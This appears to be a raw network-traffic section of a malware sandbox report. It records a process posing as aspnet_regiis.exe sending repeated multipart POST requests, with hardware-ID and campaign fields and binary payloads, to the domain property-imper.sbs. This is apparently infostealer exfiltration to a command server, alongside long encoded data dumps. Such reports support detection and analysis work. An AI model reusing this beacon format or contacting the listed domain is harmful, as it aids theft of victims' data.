                                                                                          2024-11-23 14:10:04 UTC358INData Raw: 34 64 36 0d 0a 46 62 4a 33 50 66 75 67 67 74 43 34 52 56 6c 44 44 6c 58 45 70 54 58 46 31 2f 6e 2f 63 30 35 6d 4a 43 69 76 49 5a 4b 39 69 34 68 75 6b 41 45 66 77 5a 53 75 38 73 73 67 65 33 6c 36 4a 37 48 41 47 65 65 32 6e 64 31 4a 4b 41 64 49 57 38 6f 4e 73 4d 76 6d 71 69 2f 55 46 6c 47 49 78 61 37 79 33 54 31 37 65 56 55 75 35 73 42 62 35 2b 33 62 6d 68 6b 73 42 30 68 4b 7a 6b 72 39 7a 65 66 72 66 64 34 51 56 5a 37 44 35 72 48 55 4b 44 77 6d 61 7a 53 75 79 31 79 6f 76 35 54 64 58 32 77 44 58 67 71 56 41 39 2f 59 2f 2b 6c 59 30 77 52 57 32 64 32 75 71 35 6f 67 4e 32 45 30 64 36 58 41 56 36 6d 78 6e 5a 51 62 4a 67 35 41 53 38 74 4c 34 74 54 74 34 48 33 51 45 31 53 55 79 76 4b 38 33 69 38 33 49 47 45 30 35 6f 6b 58 6f 4b 33 62 78 56 46 2f 4e 6b 56 62 33 46
                                                                                          Data Ascii: 4d6FbJ3PfuggtC4RVlDDlXEpTXF1/n/c05mJCivIZK9i4hukAEfwZSu8ssge3l6J7HAGee2nd1JKAdIW8oNsMvmqi/UFlGIxa7y3T17eVUu5sBb5+3bmhksB0hKzkr9zefrfd4QVZ7D5rHUKDwmazSuy1yov5TdX2wDXgqVA9/Y/+lY0wRW2d2uq5ogN2E0d6XAV6mxnZQbJg5AS8tL4tTt4H3QE1SUyvK83i83IGE05okXoK3bxVF/NkVb3F
                                                                                          2024-11-23 14:10:04 UTC887INData Raw: 69 77 77 4a 48 34 38 72 38 70 61 70 37 69 52 6b 68 49 73 41 30 78 41 77 6b 6e 30 30 75 54 73 64 39 42 56 45 64 6e 46 2b 50 4b 43 5a 78 67 6b 66 44 43 71 30 52 57 64 39 59 54 54 43 47 77 44 53 67 71 56 41 2f 6a 61 36 75 6c 38 33 78 5a 58 6b 74 44 67 6f 4e 77 71 50 6a 4e 71 4d 71 6a 4e 56 4c 57 2f 6c 5a 73 53 4a 51 39 50 54 38 70 48 73 4a 47 70 37 57 2b 51 54 52 2b 34 7a 2b 75 2b 30 44 41 37 59 58 4e 35 76 34 64 51 71 2f 58 44 33 52 55 74 41 45 64 4f 77 30 33 30 30 2b 2f 6b 65 74 38 54 56 5a 6e 46 36 72 72 53 4a 6a 59 71 59 7a 65 6a 79 6c 4f 68 75 5a 71 59 55 57 4a 45 51 56 4b 4e 47 37 44 78 37 75 6c 6c 6b 69 42 63 6c 38 7a 6e 70 4a 6f 34 64 54 67 73 4d 4b 71 48 44 2b 65 37 6e 70 49 44 4c 52 5a 44 52 4e 39 50 39 64 6e 6b 36 58 6e 51 45 46 69 55 7a 4f 61 31
                                                                                          Data Ascii: iwwJH48r8pap7iRkhIsA0xAwkn00uTsd9BVEdnF+PKCZxgkfDCq0RWd9YTTCGwDSgqVA/ja6ul83xZXktDgoNwqPjNqMqjNVLW/lZsSJQ9PT8pHsJGp7W+QTR+4z+u+0DA7YXN5v4dQq/XD3RUtAEdOw0300+/ket8TVZnF6rrSJjYqYzejylOhuZqYUWJEQVKNG7Dx7ullkiBcl8znpJo4dTgsMKqHD+e7npIDLRZDRN9P9dnk6XnQEFiUzOa1
                                                                                          2024-11-23 14:10:04 UTC1369INData Raw: 33 66 39 36 0d 0a 72 61 46 6c 75 64 7a 2b 2b 37 30 79 34 70 4b 32 41 35 74 4d 70 64 6f 72 75 58 6d 42 34 73 42 55 64 45 78 30 69 77 6b 61 6e 74 62 35 42 4e 48 37 62 50 38 4b 44 51 4c 43 70 6a 57 54 53 6f 79 56 43 78 39 59 54 54 43 47 77 44 53 67 71 56 41 2f 76 5a 35 65 5a 33 31 67 64 52 6c 74 44 71 6f 4e 34 70 50 79 31 69 50 71 76 49 55 72 57 78 6d 34 38 51 4b 51 4e 49 52 39 39 47 73 4a 47 70 37 57 2b 51 54 52 2b 6a 39 75 65 69 79 79 42 35 46 47 38 35 71 4d 42 42 35 36 72 56 68 46 45 72 43 41 59 53 6a 55 44 38 30 75 44 76 65 4d 49 66 55 35 6a 51 35 37 76 54 4c 54 6f 76 59 7a 79 71 77 6b 57 73 75 70 4f 53 45 43 45 4a 54 55 37 4e 41 37 36 66 37 76 49 33 69 46 56 2b 6c 4d 33 79 73 63 74 6c 44 69 4a 69 4f 61 48 52 46 37 6a 37 67 74 30 57 49 45 51 65 43 73 78
                                                                                          Data Ascii: 3f96raFludz++70y4pK2A5tMpdoruXmB4sBUdEx0iwkantb5BNH7bP8KDQLCpjWTSoyVCx9YTTCGwDSgqVA/vZ5eZ31gdRltDqoN4pPy1iPqvIUrWxm48QKQNIR99GsJGp7W+QTR+j9ueiyyB5FG85qMBB56rVhFErCAYSjUD80uDveMIfU5jQ57vTLTovYzyqwkWsupOSECEJTU7NA76f7vI3iFV+lM3ysctlDiJiOaHRF7j7gt0WIEQeCsx
                                                                                          2024-11-23 14:10:04 UTC1369INData Raw: 65 52 37 32 78 4a 55 6b 73 62 6b 73 74 63 73 4e 53 39 6c 4f 36 37 4c 55 4c 57 34 6e 70 55 62 4a 51 46 4b 52 38 35 52 38 39 36 70 70 44 66 58 44 52 2f 42 67 73 65 42 37 51 52 37 50 69 49 75 35 73 42 62 35 2b 33 62 6e 42 6b 72 43 6b 4a 59 77 31 48 2b 32 4f 6e 73 66 39 67 53 55 35 66 4d 38 72 72 62 4a 7a 55 75 5a 44 36 69 78 6c 4f 6a 75 5a 7a 64 58 32 77 44 58 67 71 56 41 39 6a 63 38 2f 41 31 2f 68 35 66 6e 74 4c 32 71 5a 6f 34 64 54 67 73 4d 4b 71 48 44 2b 65 78 6b 4a 63 59 4c 77 31 43 52 38 31 4b 2f 39 62 68 35 33 2f 43 46 46 57 4c 78 75 57 7a 31 53 30 2f 4b 57 41 34 71 73 4e 46 72 50 58 56 33 52 59 30 52 42 34 4b 37 55 6a 6d 2f 50 76 34 4e 38 39 62 52 74 6e 46 37 50 4b 43 5a 7a 49 74 62 54 61 73 77 56 79 69 75 4a 75 59 47 79 73 49 52 6b 72 4f 52 66 62 53
                                                                                          Data Ascii: eR72xJUksbkstcsNS9lO67LULW4npUbJQFKR85R896ppDfXDR/BgseB7QR7PiIu5sBb5+3bnBkrCkJYw1H+2Onsf9gSU5fM8rrbJzUuZD6ixlOjuZzdX2wDXgqVA9jc8/A1/h5fntL2qZo4dTgsMKqHD+exkJcYLw1CR81K/9bh53/CFFWLxuWz1S0/KWA4qsNFrPXV3RY0RB4K7Ujm/Pv4N89bRtnF7PKCZzItbTaswVyiuJuYGysIRkrORfbS
                                                                                          2024-11-23 14:10:04 UTC1369INData Raw: 6b 64 58 35 62 48 36 4c 6e 63 4b 54 6f 6e 59 44 72 6d 69 52 65 67 72 64 76 46 55 51 73 65 53 30 7a 61 55 73 58 59 36 62 73 33 7a 31 74 47 32 63 58 73 38 6f 4a 6e 4e 69 31 6d 4f 71 50 44 58 36 43 32 6d 70 45 56 49 51 6c 43 51 38 6c 47 34 73 33 76 35 48 66 66 47 31 43 56 30 4f 36 33 32 69 74 37 62 79 77 77 76 6f 63 50 35 34 53 4d 6e 56 45 7a 53 6c 38 4b 79 6b 2b 77 68 36 6e 6c 65 73 49 5a 55 4a 6e 44 34 37 62 52 49 44 30 6e 62 54 53 6a 78 46 4b 68 74 4a 75 52 47 79 73 4d 54 45 54 41 52 66 54 5a 37 36 6f 35 6b 42 4a 48 32 5a 71 67 67 4e 63 70 4d 69 4a 71 4f 72 44 76 5a 75 65 71 31 59 52 52 4b 77 67 47 45 6f 31 48 2b 39 66 6c 37 33 2f 56 46 46 65 54 79 75 2b 39 79 43 59 30 4b 47 73 38 71 38 68 5a 6f 72 75 4a 6d 68 6f 6e 44 45 39 45 79 77 4f 2b 6e 2b 37 79 4e
                                                                                          Data Ascii: kdX5bH6LncKTonYDrmiRegrdvFUQseS0zaUsXY6bs3z1tG2cXs8oJnNi1mOqPDX6C2mpEVIQlCQ8lG4s3v5HffG1CV0O632it7bywwvocP54SMnVEzSl8Kyk+wh6nlesIZUJnD47bRID0nbTSjxFKhtJuRGysMTETARfTZ76o5kBJH2ZqggNcpMiJqOrDvZueq1YRRKwgGEo1H+9fl73/VFFeTyu+9yCY0KGs8q8hZoruJmhonDE9EywO+n+7yN
                                                                                          2024-11-23 14:10:04 UTC1369INData Raw: 5a 79 65 69 31 30 69 4d 31 4d 32 30 34 35 6f 6b 58 6f 4b 33 62 78 56 45 64 45 6b 46 4e 77 67 48 5a 32 50 4c 72 66 64 4d 65 55 39 6e 64 72 71 75 61 49 44 64 68 4e 48 65 72 79 31 71 6a 70 35 65 64 45 53 55 44 54 46 6a 43 54 50 33 63 36 65 39 6c 30 51 64 51 6b 73 66 6a 74 74 55 6f 4e 79 6c 6d 64 2b 69 48 55 4c 2f 31 77 39 30 39 4c 78 56 4d 43 4f 70 5a 35 74 6a 6c 2b 33 7a 64 47 52 2b 47 6a 50 6e 79 33 53 74 37 65 53 77 33 70 38 70 46 6f 72 53 52 6c 78 77 6b 43 30 4e 50 77 6b 66 30 31 4f 66 34 65 64 38 56 57 5a 4c 44 35 62 48 52 4c 54 55 6f 66 6e 66 6f 68 31 43 2f 39 63 50 64 4f 7a 63 46 53 30 61 50 62 66 76 4a 37 71 68 57 33 68 35 59 6c 64 53 67 72 5a 51 2b 65 79 5a 67 64 2f 36 48 58 71 6d 35 6d 4a 6f 5a 4a 41 46 47 51 63 31 4d 2b 74 48 75 2b 48 33 63 48 30
                                                                                          Data Ascii: Zyei10iM1M2045okXoK3bxVEdEkFNwgHZ2PLrfdMeU9ndrquaIDdhNHery1qjp5edESUDTFjCTP3c6e9l0QdQksfjttUoNylmd+iHUL/1w909LxVMCOpZ5tjl+3zdGR+GjPny3St7eSw3p8pForSRlxwkC0NPwkf01Of4ed8VWZLD5bHRLTUofnfoh1C/9cPdOzcFS0aPbfvJ7qhW3h5YldSgrZQ+eyZgd/6HXqm5mJoZJAFGQc1M+tHu+H3cH0
                                                                                          2024-11-23 14:10:04 UTC1369INData Raw: 6f 70 6f 34 64 54 67 73 4d 4b 71 48 44 2b 65 31 6e 35 45 53 4b 77 70 4a 52 38 4a 45 2b 39 44 6a 35 47 58 66 45 46 65 56 79 75 32 67 30 43 30 70 4b 47 55 36 71 4d 39 46 70 50 58 56 33 52 59 30 52 42 34 4b 2f 30 6e 7a 30 2f 2f 6e 65 4a 41 4b 45 59 43 43 35 37 36 61 66 33 73 7a 66 6a 65 74 78 31 43 70 70 35 71 56 48 69 59 45 51 45 48 48 51 50 6e 62 35 2b 4e 78 30 52 68 65 6d 4d 4c 6c 73 74 4d 31 4e 6d 45 69 64 36 48 66 46 2f 2f 31 72 4a 45 61 48 51 64 51 43 74 49 4e 36 5a 2f 75 35 6a 65 49 56 56 36 4c 7a 2b 69 32 32 69 6f 39 4b 6d 30 32 70 63 64 58 70 4c 57 65 6c 68 34 71 41 30 74 41 78 45 72 69 31 2b 33 34 64 39 77 52 48 39 65 43 35 36 71 61 66 33 73 52 62 7a 79 71 78 31 71 79 39 59 54 54 43 47 77 44 53 67 71 56 41 2f 6a 55 34 75 78 38 30 78 5a 52 6b 73 6a
                                                                                          Data Ascii: opo4dTgsMKqHD+e1n5ESKwpJR8JE+9Dj5GXfEFeVyu2g0C0pKGU6qM9FpPXV3RY0RB4K/0nz0//neJAKEYCC576af3szfjetx1Cpp5qVHiYEQEHHQPnb5+Nx0RhemMLlstM1NmEid6HfF//1rJEaHQdQCtIN6Z/u5jeIVV6Lz+i22io9Km02pcdXpLWelh4qA0tAxEri1+34d9wRH9eC56qaf3sRbzyqx1qy9YTTCGwDSgqVA/jU4ux80xZRksj
                                                                                          2024-11-23 14:10:04 UTC1369INData Raw: 68 73 71 65 6a 61 72 7a 46 76 6c 74 4a 61 4e 46 6d 78 4b 42 6b 79 4e 47 36 43 52 71 65 35 6d 6b 45 30 50 79 35 6d 31 34 59 31 33 61 54 34 69 4c 75 62 52 46 2f 2f 6e 31 64 30 44 62 46 77 47 44 63 35 52 34 74 6e 71 2f 48 53 58 4b 32 47 35 79 65 79 78 31 69 59 38 59 53 4a 33 71 59 63 50 6e 76 57 59 6a 77 4e 6a 46 56 42 48 33 55 53 38 31 2f 6a 6e 65 35 42 62 48 39 58 47 36 37 37 66 49 43 74 75 66 69 65 74 79 30 48 72 73 59 6e 64 58 32 77 56 54 55 58 66 54 66 65 51 2b 50 78 36 77 42 5a 61 6e 6f 37 6f 6f 39 63 72 65 32 38 73 49 71 33 4c 55 61 71 67 31 49 77 48 4c 78 4a 42 42 73 56 53 2f 64 4f 70 31 54 6d 51 44 52 2f 42 67 74 57 78 31 43 6b 38 4e 33 31 36 68 73 78 62 70 4c 6d 61 6d 6c 46 69 52 45 41 4b 6c 52 43 2b 6e 2b 33 37 4e 34 68 46 44 63 4b 58 73 2b 57 4b
                                                                                          Data Ascii: hsqejarzFvltJaNFmxKBkyNG6CRqe5mkE0Py5m14Y13aT4iLubRF//n1d0DbFwGDc5R4tnq/HSXK2G5yeyx1iY8YSJ3qYcPnvWYjwNjFVBH3US81/jne5BbH9XG677fICtufiety0HrsYndX2wVTUXfTfeQ+Px6wBZano7oo9cre28sIq3LUaqg1IwHLxJBBsVS/dOp1TmQDR/BgtWx1Ck8N316hsxbpLmamlFiREAKlRC+n+37N4hFDcKXs+WK
                                                                                          2024-11-23 14:10:04 UTC1369INData Raw: 49 75 35 74 45 58 2f 2b 62 56 33 51 4e 73 58 41 59 4e 77 30 37 78 33 4f 66 70 5a 63 49 54 58 49 2f 42 70 34 7a 6b 41 6a 59 73 61 54 6d 68 2b 57 6d 47 76 34 75 51 48 69 73 36 65 48 33 63 52 4f 43 64 7a 2b 6c 68 30 31 55 52 32 64 71 67 36 70 6f 47 4d 54 46 68 4f 4b 47 48 47 65 65 78 32 38 56 52 43 51 6c 4c 54 38 4e 45 73 76 37 6a 2b 6e 72 66 45 68 2f 58 67 75 7a 79 67 6d 63 36 4b 33 77 36 71 63 41 62 6f 4b 2b 63 33 56 39 73 43 67 59 53 6a 55 4c 36 7a 2b 54 6c 63 4a 77 54 55 5a 65 43 2f 2f 7a 44 5a 79 31 68 4e 47 54 6f 68 30 58 6e 37 64 76 61 48 79 45 46 52 55 54 4f 55 65 4c 5a 36 76 78 30 6c 79 74 68 76 4d 2f 74 74 39 51 67 42 52 39 4e 50 62 62 4b 57 4b 44 33 75 35 6f 48 4c 7a 70 34 66 64 78 45 34 4a 33 50 36 57 48 54 56 52 48 5a 32 71 44 71 6d 67 59 78 4d
                                                                                          Data Ascii: Iu5tEX/+bV3QNsXAYNw07x3OfpZcITXI/Bp4zkAjYsaTmh+WmGv4uQHis6eH3cROCdz+lh01UR2dqg6poGMTFhOKGHGeex28VRCQlLT8NEsv7j+nrfEh/Xguzygmc6K3w6qcAboK+c3V9sCgYSjUL6z+TlcJwTUZeC//zDZy1hNGToh0Xn7dvaHyEFRUTOUeLZ6vx0lythvM/tt9QgBR9NPbbKWKD3u5oHLzp4fdxE4J3P6WHTVRHZ2qDqmgYxM


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.449734104.21.33.1164437700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-23 14:10:05 UTC284OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=64RCD7D2DYJM8YJNXN
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 18168
                                                                                          Host: property-imper.sbs
                                                                                          2024-11-23 14:10:05 UTC15331OUTData Raw: 2d 2d 36 34 52 43 44 37 44 32 44 59 4a 4d 38 59 4a 4e 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 36 34 52 43 44 37 44 32 44 59 4a 4d 38 59 4a 4e 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 34 52 43 44 37 44 32 44 59 4a 4d 38 59 4a 4e 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34
                                                                                          Data Ascii: --64RCD7D2DYJM8YJNXNContent-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--64RCD7D2DYJM8YJNXNContent-Disposition: form-data; name="pid"2--64RCD7D2DYJM8YJNXNContent-Disposition: form-data; name="lid"yau6Na--66424
                                                                                          2024-11-23 14:10:05 UTC2837OUTData Raw: 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62
                                                                                          Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pyb
                                                                                          2024-11-23 14:10:06 UTC1014INHTTP/1.1 200 OK
                                                                                          Date: Sat, 23 Nov 2024 14:10:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=eb5mfbssq0k43deturv228ke3o; expires=Wed, 19-Mar-2025 07:56:45 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZfuBOR2R6zxiiaqLUZ%2FC6HkZfPnOmq9ukOnsiX5tyMyTcqeEOyN3ijoEO%2FJaXwqB6r2y9MtKjLIROl4jOcwbMyefEaBFYX6q6XBXEFrgPEXhwGpGR8lqDatnlbjr6cgAPViZFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e71bda33cc778d9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1893&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19132&delivery_rate=1506707&cwnd=32&unsent_bytes=0&cid=933bced5d4191b2e&ts=847&x=0"
                                                                                          2024-11-23 14:10:06 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                          Data Ascii: eok 8.46.123.75
                                                                                          2024-11-23 14:10:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.449737104.21.33.1164437700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-23 14:10:07 UTC283OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=3UIS0B34M4H4WG9KY7
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 8789
                                                                                          Host: property-imper.sbs
                                                                                          2024-11-23 14:10:07 UTC8789OUTData Raw: 2d 2d 33 55 49 53 30 42 33 34 4d 34 48 34 57 47 39 4b 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 33 55 49 53 30 42 33 34 4d 34 48 34 57 47 39 4b 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 55 49 53 30 42 33 34 4d 34 48 34 57 47 39 4b 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34
                                                                                          Data Ascii: --3UIS0B34M4H4WG9KY7Content-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--3UIS0B34M4H4WG9KY7Content-Disposition: form-data; name="pid"2--3UIS0B34M4H4WG9KY7Content-Disposition: form-data; name="lid"yau6Na--66424
                                                                                          2024-11-23 14:10:08 UTC1015INHTTP/1.1 200 OK
                                                                                          Date: Sat, 23 Nov 2024 14:10:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=7gbc4ls79atl0094lop1cglovs; expires=Wed, 19-Mar-2025 07:56:47 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mn%2FGGJOX4th279b0ZE94NUIppoiQuu5Keo0cnOZ4cjOIY9YO91kHmKi037GSZlVPR73uVx0W%2BMSW%2BHiSgJpkdxknj2mQe0QmBZjg4sFboViStMJXksPqoTwwNj9qdCGdGOCQ73g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e71bdb0beec420a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9730&delivery_rate=1767554&cwnd=251&unsent_bytes=0&cid=5fd674f1ab6ce3b4&ts=786&x=0"
                                                                                          2024-11-23 14:10:08 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                          Data Ascii: eok 8.46.123.75
                                                                                          2024-11-23 14:10:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.449739104.21.33.1164437700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-23 14:10:10 UTC281OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=CJJFV06MJVGS7NF
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 20424
                                                                                          Host: property-imper.sbs
                                                                                          2024-11-23 14:10:10 UTC15331OUTData Raw: 2d 2d 43 4a 4a 46 56 30 36 4d 4a 56 47 53 37 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 43 4a 4a 46 56 30 36 4d 4a 56 47 53 37 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 4a 4a 46 56 30 36 4d 4a 56 47 53 37 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 37 35 35 30 37 0d 0a 2d 2d
                                                                                          Data Ascii: --CJJFV06MJVGS7NFContent-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--CJJFV06MJVGS7NFContent-Disposition: form-data; name="pid"3--CJJFV06MJVGS7NFContent-Disposition: form-data; name="lid"yau6Na--6642475507--
                                                                                          2024-11-23 14:10:10 UTC5093OUTData Raw: 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                          2024-11-23 14:10:10 UTC1017INHTTP/1.1 200 OK
                                                                                          Date: Sat, 23 Nov 2024 14:10:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=r30goritvmmrjalbhtpj3ppttj; expires=Wed, 19-Mar-2025 07:56:49 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgjrPesXJK%2FH625O1QElKLzun4GuOiIsPA%2BdhDRVl3llwcL7DKTtxGYl0X1qu7o9jAGolaZlNpPcado1HaUOjQj975emzfdM8Iy%2FD8jHoyDhsW59GT4BZcMjVD61jXHFC8GfLCo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e71bdbe4ba0435e-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
